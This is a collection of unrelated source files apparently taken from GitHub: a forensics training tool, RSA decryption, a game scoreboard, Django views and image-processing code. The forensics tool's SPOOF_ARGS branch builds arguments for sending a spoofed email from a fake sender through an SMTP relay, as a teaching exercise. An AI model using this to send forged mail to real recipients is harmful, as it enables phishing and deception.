isinstance(sample, SERA):\n print('Select a context first please (options 1 or 2)')\n return False\n\n if option == 'METACHALL1': #\"Chooses a metadata and ask for its value to the user\"\n file = sample.getFile(None)\n\n # Get metadata\n res = fo.getMeta(file)\n\n if res:\n # Propose a random challenge:\n metafields = list(res.keys())\n mf = random.choice(metafields)\n\n ans = 'Y'\n while ans != 'E':\n print('What is the value for the metadata field \"%s\" in the file %s? 
(Write \\'E\\' for exit)' % (mf, file))\n ans = input('Your answer: ')\n\n if res[mf] == ans:\n print('Correct!!')\n return True\n\n else:\n print('Upps try again...')\n ans = True\n\n elif option == 'METACHALL2': #\"Request the user to change the metadata of the file\"\n # Generate empty file:\n file = sample.getFile(None)\n\n # Propose the challenge:\n meta = sera.getStudentName().replace(' ', '')\n value = fo.hash(file,'md5')\n print('Include the the metadata %s:%s in the file: %s' % (meta, value, file))\n\n ans = 'k'\n while ans not in ['Y', 'E']:\n ans = input(\"Say 'Y' when you finish, 'E' to return the main manu: \")\n\n if ans == 'Y':\n # Check metadata\n if fo.isMetadata(meta, value, file):\n print('This is correct!!')\n return True\n else:\n print('Try again...')\n return False\n\n\ndef useCaseAnalysis():\n a3 = True\n while a3:\n print(\"\"\"\n Choose:\n [1] Select random use case\n [2] Receipt, She Wrote\n [3] Tupper-Fish\n [*] Back to menu (different value)\n \"\"\")\n a3 = input(\"Your answer is: \")\n a3 = int(a3)\n tags = ['receta', 'fish']\n if 1 <= a3 <= 3:\n if a3 == 1:\n t = random.choice(tags)\n else:\n t = tags[a3-2]\n\n chosen = fo.UseCase(fo.UseCase.getExammpleUseCaseList().get(t))\n print('Use case chosen:%s' % chosen.getName())\n\n # Update questions for Use Case:\n total_questions = chosen.updateQuestionsUC()\n\n # Ask questions:\n asked = []\n total = len(total_questions)\n correct = 0\n while ans.upper() != 'E' and (len(asked) < total):\n print(\"** Preparing random question (E to return the main menu) **\")\n q = chosen.getQuestionUC(chosen, asked, avoidGen=False)\n\n if len(q) > 0:\n print(\"Question: %s\" % q)\n ans = input(\">\")\n\n # Validate question:\n ans_system = fo.answerQuestionUC(chosen, q)\n if isinstance(ans_system, list):\n rx = re.compile('|'.join(ans_system))\n if rx.match(ans):\n print('Correct!!')\n correct += 1\n\n elif isinstance(ans_system, str) and (ans.upper() == ans_system.upper()):\n print('Correct!!')\n correct += 1\n else:\n print('The correct answer is: %s' % ans_system)\n\n asked = asked + [q]\n\n if ans.upper() != 'E':\n print('Congrats!! 
No more questions!!')\n print(\"Results: \\nNumber of questions:%s\\nNumber of correct answers:%s\\nPoints (over 10):%s\" %\n (total, correct, (correct * 10) / total))\n\n\n else:\n a3=False\n\n#-----------------------------------\n# TESTING METHODS\n#-----------------------------------\ndef getInfoSamples():\n # --- Parameters received from the system:\n # Information about the Activity:\n infoactivity = {\"title\":\"SERA-Signature\", \"code\":\"SERAIF\",\n \"description\":\"Calcula la signatura para comprobar si corresponde con la extensión\",\n \"evaluation\": \"+1 if the signature is correct\"}\n\n # Information about the Student:\n infostudent = {\"name\":\"Ana Nieto\", \"email\":\"nieto@lcc.uma.es\"}\n\n # Information about the System:\n infosystem = {\"path_results\":\"tmp/\",\n \"path_images\":\"resources/picture\",\n \"path_code\":\"resources/code\"}\n\n return SERA(infoactivity, infostudent, infosystem)\n\n\ndef runSamples():\n sample = getInfoSamples()\n\n SERAact = sample.getTitle()\n SERAdesc = sample.getDescription()\n eval = sample.getEvaluation()\n student = sample.getStudentName()\n filename = sample.getCompletePathFileName()\n\n gd.giveMeADocx(SERAact, student, SERAdesc, filename + '.docx', evaluation=eval, picture=sample.getSurpisePicturePath())\n gd.giveMeAXlsx(SERAact, student, SERAdesc, filename + '.xlsx', evaluation=eval, picture=sample.getSurpisePicturePath())\n\n gd.giveMeHelloFile(student, filename, '.py')\n\n gd.giveMeHelloFile(student, filename, '.cpp', '.exe')\n\n gd.giveMePicture(SERAact, student, filename, '.png', evaluation=eval)\n gd.giveMePicture(SERAact, student, filename, '.jpg', evaluation=eval)\n gd.giveMePicture(SERAact, student, filename, '.gif', evaluation=eval)\n\n return sample\n\n#-----------------------------------\n# MAIN METHOD\n#-----------------------------------\ndef main_options():\n sample = None\n ans = True\n while ans:\n print(\"\"\"\n Choose the action:\n [1] Run sample \n [2] Read context from json file\n [3] Show context\n [4] Generate random file \n [5] Generate random file and change the extension randomly\n [6] Delete current context\n [7] Check hash\n [8] Check signature\n [9] Analyse metadata\n [10] Check metadata\n [11] Check secret\n [12] Analyse email\n [13] File System analysis\n [14] Memory analysis\n [15] Use case analysis\n [16] Exit\n \"\"\")\n\n ans = input(\"Your answer is: \")\n if ans=='1': #[1] Run sample\n if sample is None:\n sample = runSamples()\n else:\n a2 = input('This option deletes the current context and generates a new one. 
Are you sure?[Y/N]')\n if a2.upper()=='Y': sample = runSamples()\n if sample: print('Files created in %s' % sample.getPathResults())\n\n elif ans=='2': #[2] Read files to generate context\n fileName = input('Your file:')\n if not os.path.isfile(fileName):\n print('Please, provide a file')\n else:\n sample = SERA(None, None, None, fileName)\n if sample is not None:\n print('Context loaded from file %s' % fileName)\n\n elif ans=='3': #[3] Show context\n if sample is not None:\n print(sample)\n else:\n print('Select a context first please (options 1 or 2)')\n\n elif ans == '4': #[4] Generate random file\n if isinstance(sample, SERA):\n # Get random file\n location = sample.getFile(None)\n if location is not None:\n print('File generated in:'+location)\n else:\n print('File not created, please check the context (3)')\n else:\n print('Select a context first please (options 1 or 2)')\n\n elif ans=='5': #[5] Generate random file and change the extension randomly\n if isinstance(sample, SERA):\n # Get random file\n location = sample.getFile(None)\n if location:\n print('File generated in:' + location)\n # Change the file extension\n newlocation = changeFileExtension(location)\n print('File changed:' + newlocation)\n else:\n print('File not created, please check the context (3)')\n else:\n print('Select a context first please (options 1 or 2)')\n\n elif ans == '6': #[6] Delete current context\n a2 = input('This option deletes the current context. Are you sure?[Y/N]')\n if a2=='Y':\n sample = None\n print('Context deleted')\n\n elif ans=='7': #[8] Check hash\n checkhash()\n\n elif ans=='8': #[9] Check signature\n checksignature()\n\n elif ans=='9': #[10] Analyse metadata\n if isinstance(sample, SERA):\n checkmetadata('METACHALL1', sample)\n else:\n print('Select a context first please (options 1 or 2)')\n\n elif ans == '10': # [11] Check metadata\n if isinstance(sample, SERA):\n checkmetadata('METACHALL2', sample)\n else:\n print('Select a context first please (options 1 or 2)')\n\n elif ans=='11': #[12] Check secret\n None\n\n elif ans=='12': #[13] Analyse email\n if isinstance(sample, SERA):\n # Send email:\n #sample.sendEmail(username, password, \"ejemplo@sera.com\", \"Ana Nieto\", \"SERA notification\")\n # Wait for the student to copy the email:\n #file = input('Please, 1. save the email received, 2. copy it to the folder and 3. provide the '\n # 'path to the file:')\n file = input('Path to the .eml file (email saved): ')\n # Ask questions:\n asked = []\n total = len(fo.PARSE_QUESTIONS_EMAIL.values())\n correct = 0\n while ans.upper()!='E' and (len(asked) < total):\n print(\"** Preparing random question (E to return the main menu) **\")\n q = fo.getQuestionEmail(asked)\n\n if len(q) > 0:\n print(\"Question: %s\" % q)\n ans = input(\">\")\n\n # Validate question:\n ans_system = fo.answerQuestionEmail(file, q)\n if isinstance(ans_system, list):\n rx = re.compile('|'.join(ans_system))\n if rx.match(ans):\n print('Correct!!')\n correct +=1\n\n elif isinstance(ans_system, str) and (ans.upper() == ans_system.upper()):\n print('Correct!!')\n correct += 1\n else:\n print('The correct answer is: %s' % ans_system)\n\n asked = asked + [q]\n\n if ans.upper()!='E':\n print('Congrats!! 
No more questions!!')\n print(\"Results: \\nNumber of questions:%s\\nNumber of correct answers:%s\\nPoints (over 10):%s\" %\n (total, correct, (correct*10)/total))\n\n\n else:\n print('Select a context first please (options 1 or 2)')\n\n # elif ans == '13': # File System analysis\n elif ans == '14': # Memory analysis\n if isinstance(sample, SERA):\n print('Select one of the following options:\\n' +\n ' [1] Choose the path for the memory to analyse\\n'\n ' [*] Any other value to assign random memory ')\n ans = input('Your answer:')\n if ans == 1:\n file = input('Please, provide the name of the file: ')\n if not os.path.isfile(file):\n print('Impossible load the file, your file will be chosen randomly...')\n file = fo.getRandomMemoryChoice()\n else:\n file = fo.getRandomMemoryChoice()\n print('This is your memory file: %s' % file)\n\n # Ask questions:\n asked = []\n total = len(fo.PARSE_QUESTIONS_MEMORY.values())\n correct = 0\n while ans.upper() != 'E' and (len(asked) < total):\n print(\"** Preparing random question (E to return the main menu) **\")\n q = fo.getQuestionMemory(asked)\n\n if len(q) > 0:\n print(\"Question: %s\" % q)\n ans = input(\">\")\n\n # Validate question:\n ans_system = fo.answerQuestionMemory(file, q)\n if isinstance(ans_system, list):\n rx = re.compile('|'.join(ans_system))\n if rx.match(ans):\n print('Correct!!')\n correct += 1\n\n elif isinstance(ans_system, str) and (ans.upper() == ans_system.upper()):\n print('Correct!!')\n correct += 1\n else:\n print('The correct answer is: %s' % ans_system)\n\n asked = asked + [q]\n\n if ans.upper() != 'E':\n print('Congrats!! No more questions!!')\n print(\"Results: \\nNumber of questions:%s\\nNumber of correct answers:%s\\nPoints (over 10):%s\" %\n (total, correct, (correct * 10) / total))\n\n\n else:\n print('Select a context first please (options 1 or 2)')\n\n\n elif ans == '15': # Use case analysis\n useCaseAnalysis()\n\n elif ans=='16': #Exit\n ans = False\n\n else:\n print('\\n Not valid choice, please try again')\n\n print('\\nBye!!')\n\n\nif __name__ == \"__main__\":\n # Generation options\n [GEN_FILE, GEN_CHANGE_EXT, GEN_HASHALG, GEN_METACHALL1, GEN_METACHALL2, GEN_SPOOF_ARGS, GEN_MEM, GEN_UC] = \\\n ['GENERA', 'GENERAEXT', 'HASHALG', 'METACHALL1', 'METACHALL2','SPOOF_ARGS', 'GEN-MEM', 'GEN-UC']\n\n # Checking options\n [CHECK_HASH, CHECK_SIGNATURE, CHECK_METAVALUE, CHECK_METADATA, CHECK_EMAILANALISIS, CHECK_MEMORY, CHECK_UC] = \\\n ['CHECK-HASH', 'CHECK-SIGNATURE', 'METAVALUE', 'METADATA', 'EMAILANALISIS', 'CHECK-MEMORY', 'CHECK-UC']\n\n if (len(sys.argv)==1):\n main_options()\n exit()\n\n inputs = json.loads(sys.argv[1])\n opinfo = inputs.get('op')\n op = opinfo.get('op')\n activity = inputs.get('activity')\n student = inputs.get('student')\n system = inputs.get('system')\n\n if op.upper() == GEN_FILE:\n sample = SERA(activity, student, system)\n location = sample.getFile(None)\n if location:\n print(location,end='')\n\n elif op.upper() == GEN_CHANGE_EXT:\n sample = SERA(activity, student, system)\n location = sample.getFile(None)\n if location:\n # print('File generated in:' + location)\n # Change the file extension\n newlocation = changeFileExtension(location)\n print(newlocation,end='')\n\n else:\n print('Error, no file',end='')\n #print('File not created, please check the context (3)')\n\n elif op.upper() == GEN_HASHALG:\n alg = random.choice(fo.ALG)\n print(alg, end='')\n\n elif op.upper() == GEN_METACHALL1:#\"Returns a metadata to be checked\"\n file = opinfo.get('file')\n\n if not os.path.isfile(file):\n 
print('', end='')#Error, no file',end='')\n\n sera = SERA(activity, student, system)\n\n # Propose a random challenge:\n res = fo.getMeta(file)\n metafields = list(res.keys())\n mf = random.choice(metafields)\n\n if res:\n print(mf,end='')\n else:\n print('')\n\n elif op.upper() == GEN_METACHALL2:#\"Returns metadata to be included\"\n file = opinfo.get('file')\n\n if not os.path.isfile(file):\n print('')\n\n print(student,end='')\n\n elif op.upper() == GEN_SPOOF_ARGS: # Sends a string with the arguments to send a fake mail using\n # python3 spoof.py cli\n sample = SERA(activity, student, system)\n smtp_server = \"mail.smtp2go.com\"\n port = \"587\"\n username = opinfo.get('username')\n password = opinfo.get('password')\n sender= gd.getFakeEmail() # Fake email to be used #\"serasystem@fakemail.com\"\n sender_name = \"Sera SYSTEM\"\n recipients = sample.getStudentEmail()\n subject = \"Este es un mensaje de SERA system\"\n\n file = gd.generaHTLM_email(sample.getPathImages() + \"fakehtmlemail.html\",\n sample.getPathResults() + sample.getFileName()+\".html\",\n \"Student\", sample.getStudentName())\n spoofstring = \"--host %s --port %s --username %s --password %s --sender %s --name \\\"%s\\\" --recipients %s \" \\\n \"--subject \\\"%s\\\" --filename %s\" % (smtp_server, port, username, password, sender, sender_name,\n recipients, subject, file)\n\n print(spoofstring, end='')\n\n\n elif op.upper() == GEN_MEM: # Sends a string with the name of a memory dump to be used\n #mem = fo.UseCase.get_UC_Evidence(fo.UseCase.getMemoryTraining(), value=fo.UseCase.MEMORY, list=True)\n cho = fo.getRandomMemoryChoice()\n print(cho, end='')\n\n elif op.upper() == GEN_UC:\n a=1\n\n\n elif op.upper()== CHECK_SIGNATURE:\n file = opinfo.get('file')\n chosen = opinfo.get('chosen')\n\n if not os.path.isfile(file):\n print(\"[{text:'Error, no file found'}]\", end='')\n\n elif not fo.checksignature(file, SERA.getFileTypeNumber(int(chosen)-1)):\n print(\"[{text:'Try again. 
Open the file with the chosen Hex Editor and check the first bytes'}]\", end='')\n else:\n print('', end='')\n\n elif op.upper() == CHECK_HASH:\n file = opinfo.get('file')\n chosen = opinfo.get('chosen')\n hashtype = opinfo.get('hash')\n\n if not os.path.isfile(file):\n print('Error, invalid file',end='')\n elif not fo.checkhash(file, chosen, hashtype):\n print('You must calculate the hash of the file using the algorithm', end='')\n\n elif op.upper() == CHECK_METAVALUE:\n \"Checks a value for a metadata\"\n file = opinfo.get('file')\n metadata = opinfo.get('metadata')\n value = opinfo.get('chosen')\n\n metafile = fo.getMeta(file)\n\n if not os.path.isfile(file) or not isinstance(metafile, dict):\n print(\"[{text:'Error, no file found'}]\", end='')\n\n elif str(metafile.get(metadata)) != value:\n print(\"[{text:'Check the metadata using the applications recommended in class'}]\", end='')\n\n else:\n print('',end='')\n\n elif op.upper() == CHECK_METADATA:#\"Checks if the metadata exists in a document\"\n file = opinfo.get('file')\n metachallenge = opinfo.get('metadata')\n\n if not os.path.isfile(file) or not isinstance(metachallenge, str):\n print(\"[{text:'Error, no file found'}]\", end='')\n\n # metadata included in the file:\n metafile = fo.getMeta(file)\n\n # metadata to be checked:\n metadata = json.loads(metachallenge)\n\n included = [k for k in metadata if k in list(metafile.keys()) and metafile.get(k) == metadata.get(k)]\n\n if len(included)==len(metadata):\n print('', end='') #Correcto\n else:\n print(\"[{text:'Please, check that the metadata has been added using the applications recommended in class'}]\", end='')\n\n\n elif op.upper()== CHECK_EMAILANALISIS: # perform questions about an email previously sended.\n opkeys = list(opinfo.keys())\n\n if \"answerto\" in opkeys:\n # check the answers to the questions\n answers = opinfo.get(\"answerto\")\n file = opinfo.get(\"file\")\n\n total = len(answers)\n correct = 0\n for q in answers:\n ans = answers[q]\n # Validate question:\n ans_system = fo.answerQuestionEmail(file, q)\n if isinstance(ans_system, list):\n rx = re.compile('|'.join(ans_system))\n if rx.match(ans):\n correct += 1\n\n elif isinstance(ans_system, str) and (ans.upper() == ans_system.upper()):\n correct += 1\n if correct < total:\n sentence = 'Please review your answers.\\nNumber of questions:%s, Correct:%s. ' \\\n 'Points(over 10):%s' % (total, correct, (correct*10)/total)\n print(\"[{text:'%s'}]\" % sentence, end='')\n\n\n else:\n # provide question\n avoid = opinfo.get(\"avoid\")\n question = fo.getQuestionEmail(avoid)\n print(question, end='')\n\n elif op.upper() == CHECK_MEMORY: # perform questions about memory previously chosen\n opkeys = list(opinfo.keys())\n\n if \"answerto\" in opkeys:\n # check the answers to the questions\n answers = opinfo.get(\"answerto\")\n file = opinfo.get(\"file\")\n\n total = len(answers)\n correct = 0\n for q in answers:\n ans = answers[q]\n # Validate question:\n ans_system = fo.answerQuestionMemory(file, q)\n if isinstance(ans_system, list):\n rx = re.compile('|'.join(ans_system))\n if rx.match(ans):\n correct += 1\n\n elif isinstance(ans_system, str) and (ans.upper() == ans_system.upper()):\n correct += 1\n if correct < total:\n sentence = 'Please review your answers.\\nNumber of questions:%s, Correct:%s. 
' \\\n 'Points(over 10):%s' % (total, correct, (correct*10)/total)\n print(\"[{text:'%s'}]\" % sentence, end='')\n\n\n else:\n # provide question\n avoid = opinfo.get(\"avoid\")\n question = fo.getQuestionMemory(avoid)\n print(question, end='')\n\n else:\n print('')\n #print('error')\n\n #Send back data\n sys.stdout.flush()\n\n\n","repo_name":"cadirneca/sera-forensics","sub_path":"seraforensics.py","file_name":"seraforensics.py","file_ext":"py","file_size_in_byte":34450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"16165035239","text":"#Descifrado RSA.\nimport time\n\n#Función de descifrado.\ndef descifrar(menCif,d,n):\n mensDescif=[]\n for k in menCif:\n decryp = (int(k)**d) % n\n mensDescif.append(chr(decryp))\n return mensDescif\n\n#Recepción de mensaje cifrado y clave privada.\nlineas = int(input('Ingrese la cantidad de mensajes desea descifrar: '))\nprint()\nfor i in range(lineas):\n menCis = input('Ingrese la lista de números que desea decodificar,' +\n ' separados por coma y espacio: ').split(\",\")\n d = int(input('Ingrese el valor d de la clave privada (d,n): '))\n n = int(input('Ingrese el valor n de la clave privada (d,n): '))\n x = time.time()*1000\n mensajeDescifrado = descifrar(menCis,d,n)\n mensajeDescifrado=\"\".join(mensajeDescifrado)\n print('Su mensaje descifrado es:', mensajeDescifrado)\n y = time.time()*1000\n print(\"El tiempo de descifrado fue de:\", y-x, \"milisegundos\")\n print()\n","repo_name":"dzambranob/Proyecto-Discretas","sub_path":"DescifradoRSA.py","file_name":"DescifradoRSA.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"21125707451","text":"import pygame.font\r\n\r\nclass Scoreboard():\r\n def __init__(self, aiSettings, screen, stats):\r\n self.screen = screen\r\n self.screenRect = screen.get_rect()\r\n self.aiSettings = aiSettings\r\n self.stats = stats\r\n\r\n self.textColor = (255, 255, 255)\r\n self.font = pygame.font.SysFont('Comic Sans MS', 22)\r\n\r\n self.prepScore()\r\n self.prepLive()\r\n self.prepHScore()\r\n\r\n def prepScore(self):\r\n scoreStr = 'Score: ' + str(self.stats.score)\r\n self.scoreImg = self.font.render(scoreStr, True, self.textColor)\r\n\r\n self.scoreRect = self.scoreImg.get_rect()\r\n self.scoreRect.center = self.screenRect.center\r\n self.scoreRect.top = 10\r\n\r\n def showScore(self):\r\n self.screen.blit(self.scoreImg, self.scoreRect)\r\n\r\n def prepLive(self):\r\n liveStr = 'Lives: ' + str(self.stats.shipLives)\r\n \r\n self.liveImg = self.font.render(liveStr, True, self.textColor)\r\n\r\n self.liveRect = self.scoreImg.get_rect()\r\n self.liveRect.left = self.screenRect.left + 20\r\n self.liveRect.top = 10\r\n\r\n def showLive(self):\r\n self.screen.blit(self.liveImg, self.liveRect)\r\n\r\n # high score of the game is store in the highscore.txt file\r\n def prepHScore(self):\r\n hScore = 0\r\n # get the high score from the file\r\n with open('highscore.txt') as fileObject:\r\n hScore = fileObject.read()\r\n hScoreStr = 'High Score: ' + str(hScore)\r\n self.hScoreImg = self.font.render(hScoreStr, True, self.textColor)\r\n\r\n self.hScoreRect = self.scoreImg.get_rect()\r\n self.hScoreRect.right = self.screenRect.right - 100\r\n self.hScoreRect.top = 10\r\n\r\n def showHScore(self):\r\n self.screen.blit(self.hScoreImg, self.hScoreRect)","repo_name":"MinhDang98/Fun-Projects","sub_path":"Alien 
Invasion/scoreboard.py","file_name":"scoreboard.py","file_ext":"py","file_size_in_byte":1803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"16191674474","text":"\nfrom django.http import HttpRequest\nfrom django.shortcuts import render\nfrom .models import Order\nfrom .forms import OrderCreateForm\nfrom cart.cart import Cart\nfrom .models import Product\nfrom . import models\n\ndef order_create(request):\n cart = Cart(request)\n\n\n if request.method == 'POST':\n try:\n object = models.Order.objects.get(user_id=request.user.pk)\n form = OrderCreateForm(request.POST)\n if form.is_valid():\n order = form.save()\n\n for item in cart:\n\n Order.objects.create(product=item,\n price=item['price'],\n quantity=item['quantity'],\n user=request.user)\n\n # очистка корзины\n cart.clear()\n return render(request, 'order_created.html',\n {'order': order})\n except:\n return render(request, 'order.html',\n {'cart': cart, 'form': form})\n else:\n form = OrderCreateForm\n return render(request, 'order.html',\n {'cart': cart, 'form': form})\n\n#def orders(request):\n #orders = Order.objects.all()\n #order_items = OrderItem.objects.all()\n #user_order_items = []\n # for order in order_items:\n # if order.user == request.user:\n#\n # user_order_items.append(order)\n # context = {'order_items': user_order_items}\n # return render(request, 'user_orders.html', context)\n\n\ndef my_orders(request):\n products = Product.objects.all()\n myorders = Order.objects.filter(user_id=request.user)\n product_ordered = OrderItem.objects.all()\n assert isinstance(request, HttpRequest)\n return render(request, 'user_orders.html', {'products': products, 'product_ordered': product_ordered, 'myorders': myorders, })\n\n\n","repo_name":"Duralax/SALUS-ver-1","sub_path":"main/orders/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"13235972241","text":"getallenrij = [23, 35, 31, 26, 73, 75, 84, 29, 42, 46]\nminoneven = 1000\nmaxeven = 0\n\nfor getal in getallenrij:\n if getal%2 == 0 and getal>maxeven:\n maxeven=getal\n elif getal num2:\n print(f'{num1} > {num2}!')\n elif num2 > num1:\n print(f'{num2} > {num1}!')\n else:\n print(f'{num1} = {num2}!')\n elif choice == 4:\n num1 = float(input('Digite um novo primeiro número:'))\n num2 = float(input('Digite um novo segundo número:'))\n elif choice == 5:\n print('Programa Finalizado!')\n else:\n print('Opção Inválida, Digite novamente!')\n","repo_name":"Logoet/Python","sub_path":"exercises/Aula14/ex059.py","file_name":"ex059.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74787397386","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Oct 23 16:31:07 2019\n\n@author: davide\n\"\"\"\nimport numpy as np\nimport math\n#import random\nimport os\n\n\n\ndef main():\n\n SimulationName=\"crossing_study\"\n nl=30\n N=nl*nl\n m=1\n gammas=np.linspace(0.05,1,20)\n L=10.0\n f=0.05\n dir_flag=0 # 0= ellipse elognated along x, 1= elliple elongated along y\n order=15\n power=0\n xi=25\n\n #CREATE SIMULATION FOLDER\n if not os.path.exists(SimulationName):\n os.makedirs(SimulationName)\n \n #SAVE PARAMETERS:\n outfile=open(SimulationName+\"/parameters.txt\",\"w\")\n outfile.write(\"N=\"+str(N)+\"\\n\")\n outfile.write(\"L=\"+str(L)+\"\\n\")\n 
outfile.write(\"f=\"+str(f)+\"\\n\")\n outfile.close()\n \n np.save(SimulationName+\"/gammas\",gammas)\n \n for i in range(len(gammas)): \n subfolder=SimulationName+\"/gamma_\"+str(i+1)\n if not os.path.exists(subfolder):\n os.makedirs(subfolder)\n \n print(\"Starting dynamics for gamma=\"+str(gammas[i]))\n grid=RegularPfc(N,L,m) # defines environment\n np.save(subfolder+\"/pfc\",grid)\n J=BuildJ(N,grid,L,gammas[i],order,power,xi) # Builds connectivity\n #V=np.random.uniform(0,1,N)\n starting_point1=[L/2,0] # starting on bottom\n starting_point2=[0,L/2.0] # starting on left\n V=correlate_activity(grid[0],starting_point2,L)\n V=V/np.mean(V)\n Vvec=dynamics(f,V,N,J)\n np.save(subfolder+\"/Vdynamics\",Vvec)\n print(\"Dynamics terminated, result saved\")\n \n print(\"END\")\n return\n\n# FUNCTIONS\n\ndef KAx(x1,x2,L,order,power,xi):\n \n dx=x1[0]-x2[0]\n dy=x1[1]-x2[1]\n if dx>float(L)/2.0:\n dx=dx-L\n elif dx<-float(L)/2.0:\n dx=dx+L\n if dy>float(L)/2.0:\n dy=dy-L\n elif dy<-float(L)/2.0:\n dy=dy+L\n \n #cosine power kernel\n r=np.sqrt(pow(dx,2)+pow(dy,2))\n theta=np.arctan2(dy,dx)\n \n k_out= pow(np.cos(theta),order)\n k_out=k_out*pow(r,power)*np.exp(-pow(r,2)/xi)\n \n \n return k_out\n \ndef KAy(x1,x2,L,order,power,xi):\n \n dx=x1[0]-x2[0]\n dy=x1[1]-x2[1]\n if dx>float(L)/2.0:\n dx=dx-L\n elif dx<-float(L)/2.0:\n dx=dx+L\n if dy>float(L)/2.0:\n dy=dy-L\n elif dy<-float(L)/2.0:\n dy=dy+L\n \n #cosine power kernel\n r=np.sqrt(pow(dx,2)+pow(dy,2))\n theta=np.arctan2(dy,dx)+(math.pi/2.0)\n \n k_out= pow(np.cos(theta),order)\n k_out=k_out*pow(r,power)*np.exp(-pow(r,2)/xi)\n \n \n return k_out\n\ndef KS(x1,x2,L):\n dx=x1[0]-x2[0]\n dy=x1[1]-x2[1]\n if dx>float(L)/2.0:\n dx=dx-L\n elif dx<-float(L)/2.0:\n dx=dx+L\n if dy>float(L)/2.0:\n dy=dy-L\n elif dy<-float(L)/2.0:\n dy=dy+L\n d=np.sqrt(pow(dx,2)+pow(dy,2))\n return np.exp(-abs(d))\n \ndef KSellipse(x1,x2,L,a1,a2):\n dx=x1[0]-x2[0]\n dy=x1[1]-x2[1]\n if dx>float(L)/2.0:\n dx=dx-L\n elif dx<-float(L)/2.0:\n dx=dx+L\n if dy>float(L)/2.0:\n dy=dy-L\n elif dy<-float(L)/2.0:\n dy=dy+L\n d=np.sqrt(a1*pow(dx,2)+a2*pow(dy,2))\n return np.exp(-abs(d)) \n\n\ndef transfer(h):\n if h>0:\n return h\n else:\n return 0\n\ndef RegularPfc(N,L,m):\n Nl=int(np.sqrt(N))\n grid=np.zeros((m,N,2))\n tempgrid=np.zeros((N,2))\n for i in range(Nl):\n for j in range(Nl):\n tempgrid[i+Nl*j][0]=i*float(L)/float(Nl)\n tempgrid[i+Nl*j][1]=j*float(L)/float(Nl)\n\n for j in range(m):\n labels=np.random.permutation(N)\n for k in range(N):\n grid[j][:]=tempgrid\n\n return grid\n\ndef BuildJ(N,grid,L,gamma,order,power,xi):\n width=L/10\n J=np.zeros((N,N))\n for i in range(N):\n for j in range(N):\n for k in range(len(grid)):\n x1=grid[k][i]\n x2=grid[k][j]\n if i!=j:\n J[i][j]=J[i][j]+KS(x1,x2,L)\n if ((L/2.0-width) (rows, columns)\n src2 = src.copy()\n\n\n\n def Hough_lines(hough_lines_threshold, img, horizontal_or_vertical): # 做 霍夫直線偵測\n img = np.uint8(img)\n dst = cv.Canny(img, canny_threshold, canny_threshold, None, 3) # 霍夫直線偵測包含Canny\n\n cv.imwrite(f'{file_name}'+\"_gray_normalized_kernel_\"+f'{horizontal_or_vertical}'+\"_\"+f'{filter_size}'+\"_canny_\"+f'{canny_threshold}'+\"-\"+f'{canny_threshold}'+\".jpg\", dst) # 生成 Canny 的結果圖\n\n lines = cv.HoughLines(dst, 1, np.pi / 360, hough_lines_threshold)\n global horizontal_lines\n global vertical_lines\n if horizontal_or_vertical == \"horizontal\":\n horizontal_lines = []\n if horizontal_or_vertical == \"vertical\":\n vertical_lines = []\n if lines is not None:\n for i in range(0, len(lines)):\n rho = lines[i][0][0]\n theta = 
lines[i][0][1]\n a = math.cos(theta)\n b = math.sin(theta)\n x0 = (a * rho)\n y0 = (b * rho)\n pt1 = [int(x0 + 5000 * (-b)), int(y0 + 5000 * a)]\n pt2 = [int(x0 - 5000 * (-b)), int(y0 - 5000 * a)]\n if (pt1[0] - pt2[0]) == 0: # 計算直線斜率\n slope = (pt1[1] - pt2[1]) / (10**(-1)) # 避免pt1[0]-pt2[0]==0 (x的變化量),導致分母為0\n else:\n slope = (pt1[1] - pt2[1]) / (pt1[0] - pt2[0])\n if (slope < 1) and (slope > -1): # 依照斜率歸類為 水平線\n horizontal_lines.append([pt1[0],pt1[1],slope])\n cv.line(src, pt1, pt2, (0, 0, 255), 2, cv.LINE_AA)\n elif (slope > 1) or (slope < -1): # 依照斜率歸類為 垂直線\n vertical_lines.append([pt1[0],pt1[1],slope])\n cv.line(src, pt1, pt2, (0, 0, 255), 2, cv.LINE_AA)\n\n\n\n def Get_intersection_points(): # 拿直線方程式取交點\n # eq: slope*x - y = slope*x0 - y0\n global intersection_points\n intersection_points = []\n print(\"Horizontal Lines Founded:\", len(horizontal_lines))\n print(\"Vertical Lines Founded:\", len(vertical_lines))\n for horizontal_line in horizontal_lines:\n for vertical_line in vertical_lines:\n coefficient = np.array([ [horizontal_line[2],-1] , [vertical_line[2],-1] ])\n constant = np.array([ [horizontal_line[2]*horizontal_line[0]-horizontal_line[1]] , [vertical_line[2]*vertical_line[0]-vertical_line[1]] ])\n intersection_point = np.linalg.solve(coefficient,constant)\n intersection_points.append( [int(intersection_point[0][0]) , int(intersection_point[1][0])] )\n cv.circle(src, (int(intersection_point[0][0]),int(intersection_point[1][0])), 5, (255,0,0), -1)\n\n\n\n def quadrant_categorization(): # 將所有的交點分類成4個象限\n global quadrant_1_corner\n global quadrant_2_corner\n global quadrant_3_corner\n global quadrant_4_corner\n quadrant_1_corner, quadrant_2_corner, quadrant_3_corner, quadrant_4_corner = [], [], [], []\n for j in intersection_points:\n if (j[0] > nc/2) and (j[1] < nr/2):\n quadrant_1_corner.append(j)\n elif (j[0] < nc/2) and (j[1] < nr/2):\n quadrant_2_corner.append(j)\n elif (j[0] < nc/2) and (j[1] > nr/2):\n quadrant_3_corner.append(j)\n elif (j[0] > nc/2) and (j[1] > nr/2):\n quadrant_4_corner.append(j)\n\n\n\n def Find_4_corners(): # 找出4個角落點\n global hough_lines_threshold\n list_included_values = 0\n while list_included_values < 4: # while迴圈判斷:四個象限內是否都存在交點,若否,則降低Hough_lines的Threshold\n list_included_values = 0\n for quadrant in range(1, 5):\n if globals()['quadrant_'+str(f'{quadrant}')+'_corner'] == []:\n hough_lines_threshold -= 10\n print(\"Current Threshold:\", 